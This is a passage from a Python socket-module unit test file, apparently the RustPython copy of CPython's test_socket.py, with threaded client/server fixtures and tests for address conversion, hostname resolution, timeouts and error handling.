`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
# TODO: RUSTPYTHON
@unittest.expectedFailure
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
